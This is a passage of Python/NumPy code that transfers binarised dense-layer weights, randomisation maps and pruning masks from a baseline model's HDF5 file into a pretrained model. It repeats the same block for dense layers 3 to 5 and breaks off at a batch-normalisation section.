pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) 
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] 
= rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 3 bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"] pret_c27= 
pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] 
= c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 4 bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"] 
pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = 
np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] 
= rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 5 bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"] pret_c27= 
pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] 
= c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # bn 1 bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] 